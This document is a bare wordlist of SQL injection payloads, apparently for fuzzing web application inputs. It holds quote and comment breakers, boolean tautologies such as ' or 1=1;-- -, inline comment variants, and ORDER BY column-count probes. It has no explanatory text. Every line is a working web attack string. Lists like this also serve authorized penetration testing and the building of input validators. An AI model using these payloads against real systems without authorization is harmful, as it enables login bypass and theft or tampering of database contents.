||
 
-- -
;
;-- -
;/*
;#
/*
'
'||
'||-- -
'-- -
';
';-- -
';/*
';#
'/*
''
'')
')
');
');-- -
');#
'#
"
"||
"--
";/*
"/*
")
"#
)
);
);-- -
);#
#
||1;
||1;-- -
-1
-1;
-1;-- -
'||1;
'||1;-- -
')||1;
')||1;-- -
)||1;
)||1;-- -
+1
+1;
+1;-- -
+1;#
 and '1'='1'
 and '1'='1';
 and '1'='1';-- -
 and '1'='1';#
 and "1"="1"
 and 1=1
 and 1=1;
 and 1=1;-- -
 and 1=1;#
' and '1'='1'
' and '1'='1';
' and '1'='1';-- -
' and '1'='1';#
' and 1=1
' and 1=1;
' and 1=1;-- -
' and 1=1;#
') and '1'='1'
') and '1'='1';
') and '1'='1';-- -
') and '1'='1';#
') and 1=1
') and 1=1;
') and 1=1;-- -
') and 1=1;#
" and "1"="1"
" and 1=1
") and "1"="1"
") and 1=1
) and '1'='1'
) and '1'='1';
) and '1'='1';-- -
) and '1'='1';#
) and "1"="1"
) and 1=1
) and 1=1;
) and 1=1;-- -
) and 1=1;#
/*asdf*/
/*asdf*/'
'/*asdf*/
'/*asdf*/'
')/*asdf*/
"/*asdf*/"
)/*asdf*/
 or 1
 or 1;
 or 1;-- -
 or 1;#
' or 1
' or 1;
' or 1;-- -
' or 1;#
') or 1
') or 1;
') or 1;-- -
') or 1;#
" or 1
") or 1
) or 1
) or 1;
) or 1;-- -
) or 1;#
 or '1'='1
 or '1'='1'
 or '1'='1';
 or '1'='1';-- -
 or '1'='1';#
 or "1"="1
 or "1"="1"
 or 1=1
 or 1=1;
 or 1=1;-- -
 or 1=1;#
' or '1'='1
' or '1'='1'
' or '1'='1';
' or '1'='1';-- -
' or '1'='1';#
' or 1=1
' or 1=1;
' or 1=1;-- -
' or 1=1;#
') or '1'='1'
') or '1'='1';
') or '1'='1';-- -
') or '1'='1';#
') or ('1'='1
') or 1=1
') or 1=1;
') or 1=1;-- -
') or 1=1;#
" or "1"="1
" or "1"="1"
" or 1=1
") or "1"="1"
") or ("1"="1
") or 1=1
) or '1'='1'
) or '1'='1';
) or '1'='1';-- -
) or '1'='1';#
) or "1"="1"
) or ("1"="1
) or 1=1
) or 1=1;
) or 1=1;-- -
) or 1=1;#
 order by 1
 order by 1;
 order by 1;-- -
 order by 1;#
' order by 1
' order by 1;
' order by 1;-- -
' order by 1;#
') order by 1
') order by 1;
') order by 1;-- -
') order by 1;#
" order by 1
") order by 1
) order by 1;
) order by 1;-- -
) order by 1;#
 order by 1000
 order by 1000;
 order by 1000;#
' order by 1000;
' order by 1000;-- -
' order by 1000;#
') order by 1000;
') order by 1000;-- -
') order by 1000;#
" order by 1000
" order by 1000;
" order by 1000;--
" order by 1000;#
 ASC
 ASC;-- -
 DESC
 DESC;-- -
